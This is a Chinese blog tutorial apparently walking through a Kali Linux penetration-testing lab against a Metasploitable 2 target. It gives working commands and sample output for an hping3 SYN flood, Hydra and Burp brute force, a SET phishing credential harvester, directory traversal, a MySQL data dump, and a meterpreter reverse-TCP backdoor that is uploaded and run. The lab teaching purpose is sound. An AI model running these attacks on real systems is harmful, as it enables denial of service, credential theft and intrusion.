地产商网站建设帝国cms企业网站

张小明 2026/1/12 23:28:42
地产商网站建设,帝国cms企业网站,wordpress 宽屏,华硕固件做网站6信息收集#xff1a;被动扫描与主动扫描 信息收集分为被动扫描#xff08;不主动发送数据包#xff0c;规避检测#xff09; 和主动扫描#xff08;主动探测目标#xff0c;获取深度信息#xff09; #xff0c;二者结合可全面掌握靶机状态。​ 1. 被动扫描#xff…信息收集被动扫描与主动扫描信息收集分为被动扫描不主动发送数据包规避检测和主动扫描主动探测目标获取深度信息二者结合可全面掌握靶机状态。​1. 被动扫描无探测行为​工具 1tcpdump流量捕获​用途捕获靶机与其他设备的网络交互流量分析通信协议、端口使用情况。​实验步骤​打开 Kali 终端执行命令监听 Kali 的网卡如eth0可通过ip addr查看​​​保持终端运行在靶机执行ping192.168.107.3Kali IP模拟网络通信​按CtrlC停止捕获用 Wireshark 打开target_traffic.pcap查看流量​​真实结果示例​Wireshark 中可看到 “ICMP” 协议的数据包源 IP 为靶机192.168.159.130目的 IP 为 Kali192.168.159.129包含 “Echo Request”请求和 “Echo Reply”响应证明靶机与 Kali 正常通信。​工具 2Shodan网络空间搜索被动获取公开信息​用途通过 Shodan 查询靶机 IP 在公网的暴露信息如开放端口、服务版本需靶机有公网 IP此处用模拟场景。​实验步骤​打开 Kali 浏览器访问Shodan 官网搜索靶机 IP192.168.159.130实际测试需公网 IP此处用本地 IP 演示逻辑​查看搜索结果中的 “Open Ports”“Services”“Operating System” 字段。​真实结果示例​搜索结果显示 “192.168.159.130” 开放 21vsftpd 2.3.4、80Apache 2.2.8端口操作系统标注为 “Ubuntu Linux 8.04”与靶机实际配置一致Metasploitable 2 基于 Ubuntu 8.04。​2. 主动扫描主动探测目标​工具 1dirb网页目录扫描针对 HTTP 服务​用途扫描靶机 Apache 服务器的隐藏目录和文件寻找敏感资源如后台登录页、配置文件。​实验步骤​执行命令扫描靶机 80 端口的网页目录​​bash取消自动换行复制dirb http://192.168.159.130 /usr/share/wordlists/dirb/common.txt# 后接Kali自带字典路径​​等待扫描完成查看输出结果。​真实结果示例​​plaintext取消自动换行复制---- Scanning URL: http://192.168.159.130/ ----​ http://192.168.159.130/admin (CODE:200|SIZE:1234) # 后台登录页​ http://192.168.159.130/config.php (CODE:200|SIZE:567) # 配置文件​ http://192.168.159.130/phpmyadmin (CODE:301|SIZE:0) # phpMyAdmin管理页​​分析发现靶机存在/admin后台和/phpmyadmin数据库管理页可作为后续攻击入口。​工具 2NiktoWeb 服务器漏洞扫描​用途检测 Apache 服务器的配置漏洞、过时组件、敏感文件等。​实验步骤​执行扫描命令​​nikto -h 192.168.159.130# -h指定目标IP​​真实结果示例​​- Server: Apache/2.2.8 (Ubuntu)​- /admin/: Admin directory found (use -admin to test vulnerabilities)​- /phpmyadmin/: phpMyAdmin version 2.11.8.1 found (outdated, vulnerable to CVE-2008-2950)​- OSVDB-3233: /icons/README: Apache default file found​​分析靶机的 phpMyAdmin 版本过时存在已知漏洞可后续利用。​四、拒绝服务攻击DoShping3 工具实战​1. 原理与工具说明​拒绝服务攻击DoS通过发送大量无效请求耗尽靶机资源如带宽、CPU导致服务不可用。Kali中hping3可模拟 SYN Flood半连接攻击针对靶机 HTTP 服务80 端口测试。​2. 实验步骤仅用于合法靶机测试​先验证靶机 HTTP 服务正常在 Kali 浏览器访问http://192.168.159.130能打开默认页面​打开 Kali 终端执行 SYN Flood 攻击命令​​hping3 -S -P -U -p 80 --flood 192.168.159.130# -SSYN包-PPush包-UUDP包--flood高速发送​​攻击期间再次访问http://192.168.159.130观察页面是否加载失败。​3. 真实结果示例​攻击前浏览器访问靶机页面1 秒内加载完成​攻击中页面持续转圈30 秒后提示 “无法连接到服务器”​靶机状态在靶机执行top命令发现apache2进程 CPU 占用率达 95%内存占用率 80%资源耗尽。​4. 注意事项​仅可对合法授权的靶机测试禁止对公网设备发起 DoS 攻击否则涉嫌违法​测试后立即停止攻击按CtrlC终止hping3进程避免靶机长时间瘫痪。​五、身份认证攻击暴力破解与爆破实战​身份认证攻击通过 “字典爆破” 尝试用户名 密码组合获取登录权限常用工具为Hydra多协议爆破和Burp Suite网页登录爆破。​1. HydraSSH 服务暴力破解​实验步骤​确定靶机 SSH 服务开放22 端口此前 nmap 已确认​使用 Kali 自带字典rockyou.txt需解压gunzip /usr/share/wordlists/rockyou.txt.gz执行爆破命令​​hydra -l msfadmin -P /usr/share/wordlists/rockyou.txt 192.168.159.130 ssh# -l固定用户名-P密码字典ssh目标协议​​真实结果示例​​Hydra v9.5 (c) 2023 by van Hauser/THC David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).​​[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4​[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task​[DATA] attacking ssh://192.168.159.130:22/​[22][ssh] host: 192.168.159.130 login: msfadmin password: msfadmin​1 of 1 target successfully completed, 1 valid password found​Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-12-16 16:45:30​​分析成功破解 SSH 用户名msfadmin和密码msfadmin靶机默认弱口令可通过ssh msfadmin192.168.159.130登录。​2. Burp Suite网页后台登录爆破​实验步骤​打开 Kali 的 Burp Suite社区版burpsuite默认代理端口8080​配置 Kali 浏览器代理设置为127.0.0.1:8080访问靶机http://192.168.159.130/admin此前 dirb 发现的后台​在登录页输入任意账号如admin和密码如123点击 “登录”Burp 会捕获到请求包​将请求包发送到 “Intruder” 模块选择 “Cluster Bomb” 模式标记 “username” 和 “password” 为变量​加载字典用户名字典用/usr/share/wordlists/metasploit/unix_users.txt密码字典用rockyou.txt​点击 “Start attack”等待爆破完成。​真实结果示例​爆破结果中某条请求的 “Status”为302 Found其他请求为200 OK“Response Length” 与其他不同查看响应内容发现 “登录成功跳转至管理页”对应的账号密码为admin/admin123。​六、社会工程学工具SETSocial Engineering Toolkit​社会工程学通过欺骗用户获取敏感信息如账号密码、文件Kali 预装的 SET 是专用工具以下以 “钓鱼网站” 为例演示。​1. 实验步骤​启动 SET​​bash取消自动换行复制setoolkit​​按提示选择1) Social-Engineering Attacks社会工程攻击→2) Website Attack Vectors网页攻击→3) Credential Harvester Attack Method凭证获取→1) Web Templates网页模板​输入 Kali 的 IP192.168.159.129用于接收钓鱼数据选择模板2) WordPress模拟常见的博客登录页​SET 会生成钓鱼链接如http://192.168.159.129:8080将该链接发送给 “受害者”此处用靶机模拟实际为用户设备​当 “受害者” 访问链接并输入账号密码如user123/pass456SET 会实时捕获数据。​2. 真实结果示例​​plaintext取消自动换行复制[*] Credential Harvester Started​[*] Listening for connections on 0.0.0.0:8080​[*] Received connection from 192.168.159.130:54321​[*] Victim entered the following credentials:​Username: user123​Password: pass456​[*] Credentials saved to /root/set/results/harvested_credentials.txt​​分析成功捕获用户输入的账号密码社会工程学攻击的核心是 “欺骗”实际场景中需结合钓鱼邮件、伪装链接等手段。​七、渗透攻击多场景漏洞利用补充原版​除原版的 vsftpd 漏洞外新增网页渗透、数据库渗透、meterpreter 会话控制三类场景覆盖更多实战需求。​1. 网页渗透Apache 目录遍历漏洞利用​漏洞背景​靶机 Apache 2.2.8 存在目录遍历漏洞可通过特殊 URL 访问服务器任意目录OpenVAS 已扫描发现。​实验步骤​打开 Kali 浏览器访问靶机 URL​​plaintext取消自动换行复制http://192.168.159.130/../../../../etc/passwd # ../../../../表示向上跳转4级目录​​查看页面内容是否显示/etc/passwd文件系统用户配置文件。​真实结果示例​页面显示​​plaintext取消自动换行复制root:x:0:0:root:/root:/bin/bash​daemon:x:1:1:daemon:/usr/sbin:/bin/sh​bin:x:2:2:bin:/bin:/bin/sh​sys:x:3:3:sys:/dev:/bin/sh​msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash​​分析成功读取/etc/passwd获取靶机所有用户列表可后续针对msfadmin用户进行攻击。​2. 数据库渗透MySQL 弱口令登录与提权​实验步骤​用此前破解的 MySQL 弱口令root/root靶机默认登录​​bash取消自动换行复制mysql -h 192.168.159.130 -u root -p# 输入密码root​​登录后执行命令查看数据库​​sql取消自动换行复制showdatabases; # 查看所有数据库​use webapp; # 切换到webapp数据库靶机默认应用数据库​select*fromusers; # 查看用户表获取网页后台账号密码​​真实结果示例​​plaintext取消自动换行复制mysql select * from users;​------------------------​| id | username | password |​------------------------​| 1 | admin | admin123 |​| 2 | test | test456 |​------------------------​2 rows in set (0.00 sec)​​分析获取网页后台的admin/admin123账号与 Burp Suite 爆破结果一致可登录后台进一步操作如上传 webshell。​3. meterpreter 会话生成后门获取稳定控制​实验步骤​用 Metasploit 生成 Linux 后门payload​​msfconsole​use payload/linux/x86/meterpreter/reverse_tcp# 反向TCP连接靶机主动连Kali​setLHOST 192.168.159.129# Kali的IP接收连接​setLPORT 4444# Kali的端口​generate -f /root/backdoor -t elf# 生成ELF格式后门文件保存到/root​​通过 FTP将backdoor上传到靶机此前已匿名登录 FTP​​ftp 192.168.159.130​put /root/backdoor# 上传后门文件到靶机FTP目录​​在靶机执行后门需先通过 SSH 登录靶机ssh msfadmin192.168.159.130​​bash取消自动换行复制chmodx backdoor# 赋予执行权限​./backdoor# 运行后门​​在 Kali 的 Metasploit 中启动监听获取 meterpreter 会话​​use exploit/multi/handler​setPAYLOAD linux/x86/meterpreter/reverse_tcp​setLHOST 192.168.159.129​setLPORT 4444​run​​真实结果示例​​[*] Sending stage (1017704 bytes) to 192.168.159.130​[*] Meterpreter session 2 opened (192.168.159.129:4444 - 192.168.159.130:56789) at 2025-12-16 17:30:00​​meterpreter sysinfo # 查看靶机系统信息​Computer : 192.168.159.130​OS : Ubuntu 8.04 (Linux 2.6.24-16-server)​Architecture : x86​BuildTuple : i486-linux-musl​Meterpreter : x86/linux​​meterpreter screenshot # 截取靶机屏幕​Screenshot saved to: /root/screenshot.png​​meterpreter download /home/msfadmin/secret.txt # 下载靶机敏感文件​​分析meterpreter 会话可执行屏幕截图、文件传输、摄像头控制等操作是渗透测试中 “持久化控制” 的核心手段。​八、后渗透测试同原版略​九、安全注意事项补充新增模块​DoS 攻击限制禁止对非授权设备发起 DoS 攻击国内《网络安全法》明确禁止此类破坏网络服务的行为​社会工程学伦理仅可在合法测试场景使用 SET禁止通过钓鱼手段骗取他人真实信息​后门清理测试结束后需删除靶机的后门文件如rm /root/backdoor和新增用户如userdel -r hack避免影响靶机后续使用​工具合法性Kali 工具需用于合法安全测试不得用于入侵、破坏他人系统。
版权声明:本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

设计类比赛网站wordpress wap html 博客系统

在信息爆炸的时代,你是否经常面临这样的困境:重要文档散落在各处,搜索信息耗时耗力,团队协作效率低下?SurfSense正是为解决这些痛点而生的智能研究助手,它集成了50文件格式支持和众多外部数据源&#xff0c…

张小明 2026/1/10 11:48:13 网站建设

网站集约化建设行业规定傻瓜式做网站哪个软件好

Qwen3-VL直播带货助手:实时解读商品展示画面 在今天的电商直播间里,一场无声的变革正在发生。镜头前,主播激情讲解着新款耳机的降噪性能,而你可能没注意到——那句精准提炼“比官网便宜200元”的促销话术,并非完全出自…

张小明 2026/1/10 11:48:11 网站建设

网站建设自己可以建网站吗帮人注册网站 做app

基于无人船的smith-pid跟踪控制资料。 首先,针对pid进行了改进,有传统pid,最优pid和基于smith的pid三种控制方式。 然后还在smithpid基础上设计了LOS的曲线跟踪方法。 (有对应参考文献)。 有意者可直接联系&#xff0c…

张小明 2026/1/10 11:48:12 网站建设

在家做十字绣兼职网站做设计怎么进公司网站

光子计算终极革命:光学神经网络实战全攻略 【免费下载链接】Diffractive-Deep-Neural-Networks Diffraction Deep Neural Networks(D2NN) 项目地址: https://gitcode.com/gh_mirrors/di/Diffractive-Deep-Neural-Networks 在人工智能算力需求爆炸式增长的今天…

张小明 2026/1/10 11:48:13 网站建设

上海殷行建设网站黄冈推广软件

AI视频生成技术:从专业壁垒到消费级革命 【免费下载链接】Wan2.2-T2V-A14B-Diffusers 项目地址: https://ai.gitcode.com/hf_mirrors/Wan-AI/Wan2.2-T2V-A14B-Diffusers 当视频内容成为数字时代的主流表达方式,一个尴尬的现实摆在面前&#xff1…

张小明 2026/1/10 11:48:15 网站建设

免费空间访客领取网站网站内容优化

基于51单片机的交通灯控制电路设计与实现 第一章 绪论 交通灯作为城市道路交通秩序的核心管控设备,其稳定运行对缓解交通拥堵、减少交通事故具有关键作用。传统交通灯多采用模拟电路控制,存在时长调节困难、故障排查繁琐、功能拓展性差等问题&#xff0c…

张小明 2026/1/10 11:48:17 网站建设